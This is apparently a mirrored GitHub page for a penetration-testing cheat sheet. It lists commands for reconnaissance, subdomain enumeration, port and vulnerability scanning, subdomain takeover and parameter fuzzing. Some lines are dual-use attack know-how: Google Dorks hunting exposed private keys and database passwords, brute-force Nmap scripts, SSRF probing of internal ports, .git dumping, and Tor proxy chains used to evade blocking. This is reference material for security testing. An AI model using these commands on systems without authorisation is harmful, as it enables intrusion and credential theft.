PhpDev.App
ivan-sincek/penetration-testing-cheat-sheet

ivan-sincek/penetration-testing-cheat-sheet

Stars: 488

Forks: 108

Pull Requests: 0

Issues: 0

Watchers: 20

Last Updated: 2023-09-05 19:56:46

Work in progress...

License: MIT License

Languages: HTML, JavaScript, Java, PHP, ASP.NET, CSS, Classic ASP, Shell

Penetration Testing Cheat Sheet

This is more of a checklist for myself. May contain useful tips and tricks.

Everything was tested on Kali Linux v2023.1 (64-bit).

For help with any of the tools write <tool_name> [-h | -hh | --help] or man <tool_name>.

Sometimes -h can be mistaken for a host or some other option. If that's the case, use -hh or --help instead, or read the manual with man.

Some tools do similar tasks, but get slightly different results. Run everything you can. Many tools complement each other!

Keep in mind when no protocol nor port number in a URL is specified, i.e. if you specify only somesite.com, some tools will default to HTTP protocol and port 80.

If you didn't already, read OWASP Web Security Testing Guide. Checklist can be downloaded here.

Highly recommend reading Common Security Issues in Financially-Orientated Web.

Websites that you should use while writing the report:

Future plans:

  • more email gathering tools,
  • Bash one-liner to transform people.txt into emails.txt, and emails.txt into usernames.txt,
  • more WordPress tools,
  • HTTP smuggling,
  • parameter pollution,
  • insecure object deserialization,
  • pre-shared key cracking,
  • email spoofing.

My other cheat sheets:

Table of Contents

0. Install Tools and Setup

1. Reconnaissance

2. Scanning/Enumeration

3. Gaining Access/Exploiting

4. Post Exploitation

5. Password Cracking

6. Social Engineering

7. Miscellaneous

0. Install Tools and Setup

Most tools can be installed with Linux package manager:

apt-get update && apt-get -y install sometool

For more information visit www.kali.org/tools.


Some tools need to be downloaded and installed with Python:

python3 setup.py install

Some tools need to be downloaded and built with Golang, or installed directly:

go build sometool.go

go install -v github.com/user/sometool@latest

To set up Golang, run apt-get -y install golang, add the following lines to ~/.zshrc, and then run source ~/.zshrc:

export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH

If you use other console, you might need to write these lines to ~/.bashrc, etc.


Some tools that are in the form of binaries or shell scripts can be moved to /usr/bin/ directory for the ease of use:

mv sometool.sh /usr/bin/sometool && chmod +x /usr/bin/sometool

Some tools need to be downloaded and ran with Java (JRE):

java -jar sometool.jar

API Keys

List of useful APIs to integrate in your tools:

User-Agents

Download a list of bot-safe User-Agents (requires scrapeops.io API key):

python3 -c 'import json, requests; open("./user_agents.txt", "w").write(("\n").join(requests.get("http://headers.scrapeops.io/v1/user-agents?api_key=SCRAPEOPS_API_KEY&num_results=100", verify = False).json()["result"]))'

DNS Resolvers

Download a list of trusted DNS resolvers (or manually from github.com/trickest/resolvers):

python3 -c 'import json, requests; open("./resolvers.txt", "w").write(requests.get("https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt", verify = False).text)'

ProxyChains-NG

If Google or any other search engine or service blocks your tool, use ProxyChains-NG and Tor to bypass restrictions.

Installation:

apt-get update && apt-get -y install proxychains4 tor torbrowser-launcher

Do the following changes to /etc/proxychains4.conf file:

round_robin
chain_len = 1
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 9050

Make sure to comment any chain type other than round_robin - e.g. comment strict_chain.

Don't forget to start Tor:

service tor start

Then, run any tool you want:

proxychains4 sometool

Using only Tor most likely won't be enough, you will need to add more proxies (1)(2) to /etc/proxychains4.conf file; although, it is hard to find free and stable proxies that are not already blacklisted.

Download a list of free proxies:

curl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | jq -r '.data[] | "\(.protocols[]) \(.ip) \(.port)"' > proxychains.txt

curl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | jq -r '.data[] | "\(.protocols[])://\(.ip):\(.port)"' > proxies.txt

1. Reconnaissance

Keep in mind that some websites are accessible only through older web browsers such as Internet Explorer.

Keep in mind that some websites may be missing the index page and may not redirect you to the home page at all. If that's the case, try to manually guess a full path to the home page, use wayback machine (gau) to find old URLs, or try directory fuzzing with DirBuster.

Search the Internet for default paths and files for a specific web application. Use the gathered information in combination with Google Dorks or httpx to find the same paths/files on different websites. For not so common web applications, try to find and browse the source code for default paths/files.

You can find the application's source code on GitHub, GitLab, searchcode, etc.

Search the application's source code for API keys, SSH keys, credentials, tokens, hidden hosts and domains, etc. Don't forget to check old GitHub commits for old but still active API keys, secret tokens, etc.

Inspect the web console for possible errors. Inspect the application's source code for possible comments.

Don't forget to access the web server over an IP address because you may find server's default welcome page or some other content.

1.1 Useful Websites

Dmitry

Gather information:

dmitry -wines -o dmitry_results.txt somedomain.com

Deprecated. Netcraft search does not work.

theHarvester

Gather information:

theHarvester -f theharvester_results.xml -b baidu,bevigil,bing,bingapi,certspotter,crtsh,dnsdumpster,duckduckgo,hackertarget,otx,threatminer,urlscan,yahoo -l 500 -d somedomain.com

This tool is changing the search engines quite often, as such, some of them might not work as of this reading.

Sometimes the output file might default to /usr/lib/python3/dist-packages/theHarvester/ directory.

Extract hostnames from the results:

grep -Po '(?<=\<host\>)(?!\<(?:ip|hostname)\>)[^\s]+?(?=\<\/host\>)|(?<=\<hostname\>)[^\s]+?(?=\<\/hostname\>)' theharvester_results.xml | sort -uf | tee -a subdomains.txt

Extract IPs from the results:

grep -Po '(?<=\<ip\>)[^\s]+?(?=\<\/ip\>)' theharvester_results.xml | sort -uf | tee -a ips.txt

Extract emails from the results:

grep -Po '(?<=\<email\>)[^\s]+?(?=\<\/email\>)' theharvester_results.xml | sort -uf | tee -a emails.txt

FOCA (Fingerprinting Organizations with Collected Archives)

Find metadata and hidden information in files.

Tested on Windows 10 Enterprise OS (64-bit).

Setup:

GUI is very intuitive.

uncover

Installation:

go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest

Set your API keys in /root/.config/uncover/provider-config.yaml file as following:

shodan:
  - SHODAN_API_KEY
censys:
  - CENSYS_API_ID:CENSYS_API_SECRET
fofa: []

Gather information using Shodan, Censys, and more:

uncover -nc -json -o uncover_results.json -l 100 -e shodan,censys -q somedomain.com

jq '.host | select (. != "")' uncover_results.json | sort -uf | tee -a subdomains.txt

jq '.ip | select (. != "")' uncover_results.json | sort -uf | tee -a ips.txt

TO DO: Shodan and Censys Dorks.

assetfinder

Gather subdomains using OSINT:

assetfinder --subs-only somedomain.com | grep -v '*' | tee assetfinder_results.txt

Sublist3r

Gather subdomains using OSINT:

sublist3r -o sublister_results.txt -d somedomain.com

Subfinder

Gather subdomains using OSINT:

subfinder -silent -t 10 -timeout 3 -nW -o subfinder_results.txt -rL resolvers.txt -d somedomain.com

Subfinder has built-in DNS resolvers.

Set your API keys in /root/.config/subfinder/config.yaml file as following:

shodan:
  - SHODAN_API_KEY
censys:
  - CENSYS_API_ID:CENSYS_API_SECRET
github:
  - GITHUB_API_KEY
virustotal:
  - VIRUSTOTAL_API_KEY

Amass

Gather subdomains using OSINT:

amass enum -passive -o amass_results.txt -trf resolvers.txt -d somedomain.com

Amass has built-in DNS resolvers.

To find ASNs from IPs and CIDRs from ASNs, use WHOIS. The below ASN and CIDR scans will take a long time to finish. The results might not be all within your scope!

Gather subdomains by the ASN:

amass intel -o amass_asn_results.txt -trf resolvers.txt -asn 13337

Gather subdomains by the CIDR:

amass intel -o amass_cidr_results.txt -trf resolvers.txt -cidr 192.168.8.0/24

dig

Fetch name servers:

dig +noall +answer -t NS somedomain.com

Fetch exchange servers:

dig +noall +answer -t MX somedomain.com

Interrogate a domain name server:

dig +noall +answer -t ANY somedomain.com @ns.somedomain.com

Fetch the zone file from a domain name server:

dig +noall +answer -t AXFR somedomain.com @ns.somedomain.com

Reverse DNS lookup:

dig +noall +answer -x 192.168.8.5

[Subdomain Takeover] Check if domains/subdomains are dead or not, look for NXDOMAIN, SERVFAIL, or REFUSED status codes:

for subdomain in $(cat subdomains.txt); do res=$(dig "${subdomain}" -t A +noall +comments +timeout=3 | grep -Po '(?<=status\:\ )[^\s]+(?<!\,)'); echo "${subdomain} | ${res}"; done | sort -uf | tee -a subdomains_to_status.txt

grep -v 'NOERROR' subdomains_to_status.txt | grep -Po '[^\s]+(?=\ \|)' | sort -uf | tee -a subdomains_error.txt

grep 'NOERROR' subdomains_to_status.txt | grep -Po '[^\s]+(?=\ \|)' | sort -uf | tee -a subdomains_error_none.txt

Fierce

Interrogate domain name servers:

fierce -file fierce_std_results.txt --domain somedomain.com

fierce -file fierce_brt_results.txt --subdomain-file subdomains-top1mil.txt --domain somedomain.com

By default, Fierce will perform brute force attack with its built-in wordlist.

DNSRecon

Interrogate domain name servers:

dnsrecon -t std --json /root/Desktop/dnsrecon_std_results.json -d somedomain.com

dnsrecon -t axfr --json /root/Desktop/dnsrecon_axfr_results.json -d somedomain.com

dnsrecon -v --iw -f --lifetime 3 --threads 50 -t brt --json /root/Desktop/dnsrecon_brt_results.json -D subdomains-top1mil.txt -d somedomain.com

DNSRecon can perform a brute force attack with a user-defined wordlist, but make sure to specify a full path to the wordlist; otherwise, DNSRecon might not recognize it.

Make sure to specify a full path to the output file; otherwise, it will default to /usr/share/dnsrecon/ directory (i.e. to the root directory).

Extract hostnames from the standard/zone transfer/brute force results:

jq -r '.[] | if (.type == "A" or .type == "AAAA" or .type == "CNAME" or .type == "MX" or .type == "NS" or .type == "PTR") then (.exchange, .name, .target) else (empty) end | select(. != null)' dnsrecon_std_results.json | sort -uf | tee -a subdomains.txt

Extract IPs from the standard/zone transfer/brute force results:

jq -r '.[] | if (.type == "A" or .type == "AAAA" or .type == "CNAME" or .type == "MX" or .type == "NS" or .type == "PTR") then (.address) else (empty) end | select(. != null)' dnsrecon_std_results.json | sort -uf | tee -a ips.txt

[Subdomain Takeover] Extract canonical names from the standard/zone transfer/brute force results:

jq -r '.[] | if (.type == "CNAME") then (.target) else (empty) end | select(. != null)' dnsrecon_std_results.json | sort -uf | tee -a cnames.txt

Reverse DNS lookup:

dnsrecon --json /root/Desktop/dnsrecon_reverse_results.json -s -r 192.168.8.0/24

Extract virtual hosts from the reverse DNS lookup results:

jq -r '.[] | if (type == "array") then (.[].name) else (empty) end | select(. != null)' dnsrecon_reverse_results.json | sort -uf | tee -a subdomains.txt

host

Some DNS servers will not respond to DNS quieries of type 'ANY', use type 'A' instead.

Gather IPs for the given domains/subdomains (ask for A records):

for subdomain in $(cat subdomains.txt); do res=$(host -t A "${subdomain}" | grep -Po '(?<=has\ address\ )[^\s]+(?<!\.)'); if [[ ! -z $res ]]; then echo "${subdomain} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a subdomains_to_ips.txt

grep -Po '(?<=\|\ )[^\s]+' subdomains_to_ips.txt | sort -uf | tee -a ips.txt

Check if domains/subdomains are alive or not with httpx. Check if IPs are alive or not with Nmap.

Gather virtual hosts for the given IPs (ask for PTR records):

for ip in $(cat ips.txt); do res=$(host -t PTR "${ip}" | grep -Po '(?<=domain\ name\ pointer\ )[^\s]+(?<!\.)'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_subdomains.txt

grep -Po '(?<=\|\ )[^\s]+' ips_to_subdomains.txt | sort -uf | tee -a subdomains.txt

[Subdomain Takover] Gather canonical names for the given domains/subdomains (ask for CNAME records):

for subdomain in $(cat subdomains.txt); do res=$(host -t CNAMES "${subdomain}" | grep -Po '(?<=is\ an\ alias\ for\ )[^\s]+(?<!\.)'); if [[ ! -z $res ]]; then echo "${subdomain} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a subdomains_to_cnames.txt

grep -Po '(?<=\|\ )[^\s]+' subdomains_to_cnames.txt | sort -uf | tee -a cnames.txt

WHOIS, ASN, CIDR

Gather ASNs for the given IPs:

for ip in $(cat ips.txt); do res=$(whois -h whois.cymru.com "${ip}" | grep -Poi '^\d+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_asns.txt

grep -Po '(?<=\|\ )(?(?!\ \|).)+' ips_to_asns.txt | sort -uf | tee -a asns.txt

Gather CIDRs for the given ASNs:

for asn in $(cat asns.txt); do res=$(whois -h whois.radb.net -i origin "AS${asn}" | grep -Poi '(\b25[0-5]|\b2[0-4][0-9]|\b[01]?[0-9][0-9]?)(\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}\/[0-9]+'); if [[ ! -z $res ]]; then echo "AS${asn} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a asns_to_cidrs.txt

grep -Po '(?<=\|\ )(?(?!\ \|).)+' asns_to_cidrs.txt | sort -uf | tee -a cidrs.txt

[Subdomain Takeover] Gather organization names (and more) for the given IPs:

for ip in $(cat ips.txt); do res=$(whois -h whois.arin.net "${ip}" | grep -Po '(?<=OrgName\:)[\s]+\K.+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_organization_names.txt

grep -Po '(?<=\|\ )(?(?!\ \|).)+' ips_to_organization_names.txt | sort -uf | tee -a organization_names.txt

Check if any IP belongs to GitHub organization, more info about GitHub takeover in this article.

httpx

Check if domains/subdomains are alive or not (map live hosts):

httpx-toolkit -o subdomains_live.txt -l subdomains_error_none.txt

httpx-toolkit -random-agent -json -o httpx_results.json -threads 100 -timeout 3 -l subdomains.txt -ports 80,443,8008,8080,8403,8443,9008,9080,9403,9443

Filter domains/subdomains from the JSON results:

jq -r '.url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_live_long.txt

grep -Po 'http\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_http.txt

grep -Po 'https\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_https.txt

grep -Po '(?<=\:\/\/)[^\s\:]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live.txt

jq -r 'select(."status-code" >= 200 and ."status-code" < 300) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_2xx.txt

jq -r 'select(."status-code" >= 300 and ."status-code" < 400) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_3xx.txt

jq -r 'select(."status-code" < 300 or ."status-code" >= 400) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_3xx_none.txt

jq -r 'select(."status-code" >= 400 and ."status-code" < 500) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_4xx.txt

jq -r 'select(."status-code" == 401) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_401.txt

jq -r 'select(."status-code" == 403) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_403.txt

Check if directory exists on a web server:

httpx-toolkit -status-code -content-length -o httpx_results.txt -l subdomains_live.txt -path /.git

gau

Gather URLs from the wayback machine:

getallurls somedomain.com | tee gau_results.txt

for subdomain in $(cat subdomains_live.txt); do getallurls "${subdomain}"; done | sort -uf | tee gau_results.txt

Filter URLs from the results:

httpx-toolkit -random-agent -json -o httpx_gau_results.json -threads 100 -timeout 3 -r resolvers.txt -l gau_results.txt

jq -r 'select(."status-code" >= 200 and ."status-code" < 300) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_2xx_results.txt

jq -r 'select(."status-code" >= 300 and ."status-code" < 400) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_3xx_results.txt

jq -r 'select(."status-code" >= 400) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_4xx_results.txt

jq -r 'select(."status-code" == 401) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_401_results.txt

jq -r 'select(."status-code" == 403) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_403_results.txt

urlhunter

Installation:

go install -v github.com/utkusen/urlhunter@latest

Gather URLs from URL shortening services:

urlhunter -o urlhunter_results.txt -date latest -keywords keywords.txt

Google Dorks

Google Dorks databases:

Check the list of /.well-known/ files here.

Google Dorking will not show directories nor files that are disallowed in robots.txt, to check for such directories and files use httpx.

Append site:www.somedomain.com to limit your scope to a specified domain/subdomain. Append site:*.somedomain.com to limit your scope to all subdomains. Append site:*.somedomain.com -www to exclude www subdomain from results.

Simple Google Dorks examples:

inurl:/robots.txt intext:disallow ext:txt

inurl:/.well-known/security.txt ext:txt

inurl:/info.php intext:"php version" ext:php

intitle:"index of /" intext:"parent directory"

intitle:"index of /.git" intext:"parent directory"

inurl:/gitweb.cgi

intitle:"Dashboard [Jenkins]"

(intext:"mysql database" AND intext:db_password) ext:txt

intext:-----BEGIN PGP PRIVATE KEY BLOCK----- (ext:pem OR ext:key OR ext:txt)

Chad

Find and download files using Google Dorks:

chad -sos no -d chad_results -tr 100 -q "ext:txt OR ext:pdf OR ext:doc OR ext:docx OR ext:xls OR ext:xlsx" -s *.somedomain.com -o chad_results.json

Extract authors (and more) from the files:

apt-get -y install libimage-exiftool-perl

exiftool -S chad_results | grep -Po '(?<=Author\:\ ).+' | sort -uf | tee -a people.txt

Run a single Google Dork:

chad -sos no -q 'intitle:"index of /" intext:"parent directory"' -s *.somedomain.com

For advanced use and automation, check the project page.

git-dumper

Try to reconstruct a GitHub repository (i.e. get the source code) based on the commit history from a public /.git directory:

git-dumper https://somesite.com/.git git_dumper_results

This tool might not be able to reconstruct the whole repository at all times, but it could still reveal some sensitive information.

Some additional git commands to try on the cloned /.git directory:

git status

git log

git checkout -- .

git restore .

Use Google Dorking and Chad to find more targets.

TruffleHog

Installation:

git clone https://github.com/trufflesecurity/trufflehog && cd trufflehog

go install

Search for sensitive keys inside a single repository or the whole organization on GitHub:

trufflehog git https://github.com/trufflesecurity/test_keys --only-verified --json

trufflehog github --org=trufflesecurity --only-verified --json

Search for sensitive keys inside files and directories:

trufflehog filesystem somefile_1.txt somefile_2.txt somedir1 somedir2

For more usage, check github.com/trufflesecurity/trufflehog.

Directory Fuzzing

Don't forget that GNU/Linux OS has a case sensitive file system, so make sure to use an appropriate wordlists.

If you don't get any hits while brute forcing directories, try to brute force files by specifying file extensions.

The following tools support recursive directory search and file search; also, they might take a long time to finish depending on the settings and wordlist used.

Find out how to bypass 4xx HTTP response status codes from my other project.

DirBuster

DirBuster

Figure 1 - DirBuster

All DirBuster's wordlists are located at /usr/share/dirbuster/wordlists/ directory.

feroxbuster

Brute force directories on a web server:

cat subdomains_live_long.txt | feroxbuster -q --auto-bail --random-agent -t 50 -T 3 -k -n --stdin -o feroxbuster_results.txt -s 200,301,302,401,403 -w directory-list-lowercase-2.3-medium.txt

This tool seems to be faster than DirBuster.

Filter directories from the results:

grep -Po '(?<=200)\K.+\K(?<=c\ )[^\s]+' feroxbuster_results.txt | sort -uf | tee -a directories_200.txt

grep -Po '(?<=301|302)\K.+\K(?<=c\ )[^\s]+' feroxbuster_results.txt | sort -uf | tee -a directories_3xx.txt

grep -Po '(?<=401)\K.+\K(?<=c\ )[^\s]+' feroxbuster_results.txt | sort -uf | tee -a directories_401.txt

grep -Po '(?<=403)\K.+\K(?<=c\ )[^\s]+' feroxbuster_results.txt | sort -uf | tee -a directories_403.txt
Option Description
-u The target URL (required, unless [--stdin | --resume-from] is used)
--stdin Read URL(s) from STDIN
-a/-A Sets the User-Agent (default: feroxbuster/2.7.3) / Use a random User-Agent
-x File extension(s) to search for (ex: -x php -x pdf,js)
-m Which HTTP request method(s) should be sent (default: GET)
--data Request's body; can read data from a file if input starts with an @(ex: @post.bin)
-H Specify HTTP headers to be used in each request (ex: -H header:val -H 'stuff:things')
-b Specify HTTP cookies to be used in each request (ex: -b stuff=things)
-Q Request's URL query parameters (ex: -Q token=stuff -Q secret=key)
-f Append / to each request's URL
-s Status Codes to include (allow list) (default: 200,204,301,302,307,308,401,403,405)
-T Number of seconds before a client's request times out (default: 7)
-k Disables TLS certificate validation for the client
-t Number of concurrent threads (default: 50)
-n Do not scan recursively
-w Path to the wordlist
--auto-bail Automatically stop scanning when an excessive amount of errors are encountered
-B Automatically request likely backup extensions for "found" URLs
-q Hide progress bars and banner (good for tmux windows w/ notifications)
-o Output file to write results to (use w/ --json for JSON entries)

snallygaster

Download the latest version from GitHub. See how to install the tool.

Search a web server for sensitive files:

snallygaster --nowww somesite.com | tee snallygaster_results.txt

for subdomain in $(cat subdomains_live_long_http.txt); do snallygaster --nohttps --nowww "${subdomain}"; done | tee snallygaster_http_results.txt

for subdomain in $(cat subdomains_live_long_https.txt); do snallygaster --nohttp --nowww "${subdomain}"; done | tee snallygaster_https_results.txt

IIS Tilde Short name Scanning

Download:

git clone https://github.com/irsdl/IIS-ShortName-Scanner && cd IIS-ShortName-Scanner/release

Search an IIS server for files and directories:

java -jar iis_shortname_scanner.jar 2 30 https://somesite.com

Bypassing 401 and 403

Find out how to bypass 4xx HTTP response status codes from my other project.

WhatWeb

Identify a website:

whatweb -v somesite.com

Parsero

Test all robots.txt entries:

parsero -sb -u somesite.com

EyeWitness

Grab screenshots from websites:

eyewitness --no-prompt --no-dns --timeout 3 --threads 5 -d eyewitness_results -f subdomains_live_long.txt

To check the screenshots, navigate to eyewitness_results/screens directory.

Wordlists

You can find rockyou.txt inside /usr/share/wordlists/ directory or inside SecLists - a useful collection of multiple types of wordlists for security assessments.

Install SecLists (the collection will be stored at /usr/share/seclists/ directory):

apt-get update && apt-get install seclists

Another popular wordlist collections:

2. Scanning/Enumeration

Keep in mind that web applications can be hosted on other ports besides 80 (HTTP) and 443 (HTTPS), e.g. they can be hosted on port 8443 (HTTPS).

Keep in mind that on ports 80 (HTTP) and 443 (HTTPS) a web server can host different web applications or some other services entirely. Use Ncat or Telnet for banner grabbing.

Keep in mind that on different URL paths a web server can host different web applications or some other services entirely, e.g. somesite.com/app_one/ and somesite.com/app_two/.

While scanning for vulnerabilities or running any other intensive scans, periodically check the web application/service in case it crashed so you can alert your client as soon as possible. Also, many times you might get temporarily blocked by the web application firewall (WAF) or some other security product and all your subsequent requests will be invalid.

If a web application all of sudden stops responding, try to access the web application with your mobile data (i.e. use a different IP). It is possible that your current IP was temporarily blocked.

Send an email message to a non-existent address at target's domain, it will often reveal useful internal network information through a nondelivery notification (NDN).

Try to invest into Nessus Professional and Burp Suite Professional or any other similar permium tools if you can afford them.

2.1 Useful Websites

Nmap

For better results, use IPs instead of domain names.

Some web servers will not respond to ping (ICMP) requests, so the mapping of the live hosts will not be accurate.

Ping sweep (map live hosts):

nmap -sn -oG nmap_ping_sweep_results.txt 192.168.8.0/24

nmap -sn -oG nmap_ping_sweep_results.txt -iL cidrs.txt

Extract live hosts from the results:

grep -Po '(?<=Host\:\ )[^\s]+' nmap_ping_sweep_results.txt | sort -uf | tee -a ips_live.txt

TCP scan (all ports):

nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- 192.168.8.0/24

nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- -iL cidrs.txt

[Variation] TCP scan (all ports):

mkdir nmap_tcp_results

for ip in $(cat ips_live.txt); do nmap -nv -sS -sV -sC -Pn -oN "nmap_tcp_results/nmap_tcp_results_${ip//./_}.txt" -p- "${ip}"; done

UDP scan (only important ports):

nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 192.168.8.0/24

nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -iL cidrs.txt

[Variation] UDP scan (only important ports):

mkdir nmap_udp_results

for ip in $(cat ips_live.txt); do nmap -nv -sU -sV -sC -Pn -oN "nmap_udp_results/nmap_udp_results_${ip//./_}.txt" -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 "${subdomain}"; done
Option Description
-sn Ping scan - disable port scan
-Pn Treat all hosts as online -- skip host discovery
-n/-R Never do DNS resolution/Always resolve (default: sometimes)
-sS/sT/sA TCP SYN/Connect()/ACK
-sU UDP scan
-p/-p- Only scan specified ports/Scan all ports
--top-ports Scan most common ports
-sV Probe open ports to determine service/version info
-O Enable OS detection
-sC Same as --script=default
--script Script scan (takes time to finish)
--script-args Provide arguments to scripts
--script-help Show help about scripts
-oN/-oX/-oG Output scan in normal, XML, and Grepable format
-v Increase verbosity level (use -vv or more for greater effect)
--reason Display the reason a port is in a particular state
-A Enable OS detection, version detection, script scanning, and traceroute

All Nmap's scripts are located at /usr/share/nmap/scripts/ directory. Read more about the scripts here.

NSE examples:

nmap -nv --script='mysql-brute' --script-args='userdb="users.txt", passdb="rockyou.txt"' 192.168.8.5 -p 3306

nmap -nv --script='dns-brute' --script-args='dns-brute.domain="somedomain.com", dns-brute.hostlist="subdomains-top1mil.txt"'

nmap -nv --script='ssl-heartbleed' -iL cidrs.txt

You can find rockyou.txt and subdomains-top1mil.txt wordlists in SecLists.

I prefer to use Nuclei for vulnerability scanning.

Nikto

Scan a web server:

nikto -output nikto_results.txt -h somesite.com -p 80

WPScan

Scan a WordPress website:

wpscan -o wpscan_results.txt --url somesite.com

testssl.sh

Installation:

apt-get update && apt-get -y install testssl.sh

Test an SSL/TLS certificate (i.e. SSL/TLS ciphers, protocols, etc.):

testssl --openssl /usr/bin/openssl -oH testssl_results.html somesite.com

You can also use testssl.sh to exploit SSL/TLS vulnerabilities.

OpenSSL

Test a web server for Heartbleed vulnerability:

for subdomain in $(cat subdomains_live.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}:443" 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt

for subdomain in $(cat subdomains_live_long_https.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}" 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt

keytool

Grab SSL/TLS certificate:

keytool -printcert -rfc -sslserver ebay.com > keytool_results.txt

openssl x509 -noout -text -in keytool_results.txt

Use uncover with certificate Shodan and Censys Dorks to find more possibly in-scope hosts.

3. Gaining Access/Exploiting

Always try the null session login (i.e. no password login) or search the Internet for default credentials for a specific web application.

Try to manipulate cookies or tokens to gain access or elevate privileges.

Try to change an HTTP POST request into an HTTP GET request (i.e. into a query string) and see if a server will accept it.

Turn off JavaScript in your web browser and check the web application behaviour again.

Check the web application behaviour on mobile devices, e.g. check m.somesite.com for vulnerabilities because some features might work differently.

If you want to automate your code injection testing, check the Wordlists sub-section for code injection wordlists. Most of the wordlists also include obfuscated code injections.

Don't forget to remove all the created artifacts after you are done testing.

3.1 Useful Websites

Collaborator Servers

Exploit open redirect, blind cross-site scripting (XSS), DNS/HTTP interaction, etc.

Subdomain Takeover

Gather as much information as you can for a specified target, see how in 1. Reconnaissance.

Gather organization names with WHOIS, and canonical names with host.

You can double check if domains/subdomains are alive or not with dig and httpx.

Check if hosting providers for the found domains/subdomains are vulnerable to domain/subdomain takeover at EdOverflow/can-i-take-over-xyz. Credits to the author!

Popular cloud service providers:

Subzy

Installation:

go install -v github.com/lukasikic/subzy@latest

Check for domains/subdomains takeover:

subzy -concurrency 100 -timeout 3 -targets subdomains.txt | tee subzy_results.txt

subjack

Installation:

go install -v github.com/haccer/subjack@latest

Check for domains/subdomains takeover:

subjack -v -o subjack_results.json -t 100 -timeout 3 -a -m -w subdomains.txt

Nuclei

Installation:

apt-get update && apt-get -y install nuclei

Download the latest Nuclei templates.

To download and/or update Nuclei templates, run:

mkdir ~/nuclei-templates && nuclei -ut ~/nuclei-templates

Vulnerability scan (all templates):

nuclei -c 500 -o nuclei_results.txt -l subdomains_live.txt

cat nuclei_results.txt | grep -Po '(?<=\]\ ).+' | sort -uf > nuclei_sorted_results.txt

Only subdomain takeover:

nuclei -c 500 -t ~/nuclei-templates/takeovers -o nuclei_takeover_results.txt -l subdomains_live.txt

WFUZZ

Fuzz directories:

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/WFUZZ" -w directory-list-lowercase-2.3-medium.txt

Fuzz parameter values:

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?someparam=WFUZZ" -w somewordlist.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "https://somesite.com/someapi" -d "someparam=WFUZZ" -w somewordlist.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/json" -u "https://somesite.com/someapi" -d "{\"someparam\": \"WFUZZ\"}" -w somewordlist.txt

Fuzz parameters:

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?WFUZZ=somevalue" -w somewordlist.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "https://somesite.com/someapi" -d "WFUZZ=somevalue" -w somewordlist.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/json" -u "https://somesite.com/someapi" -d "{\"WFUZZ\": \"somevalue\"}" -w somewordlist.txt

Additional example, internal SSRF fuzzing:

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?url=127.0.0.1:WFUZZ" -w ports.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?url=WFUZZ:80" -w ips.txt
Option Description
-f Store results in the output file
-t Specify the number of concurrent connections (10 default)
-s Specify time delay between requests (0 default)
-u Specify a URL for the request
-w Specify a wordlist file
-X Specify an HTTP method for the request, i.e. HEAD or FUZZ
-b Specify a cookie for the requests
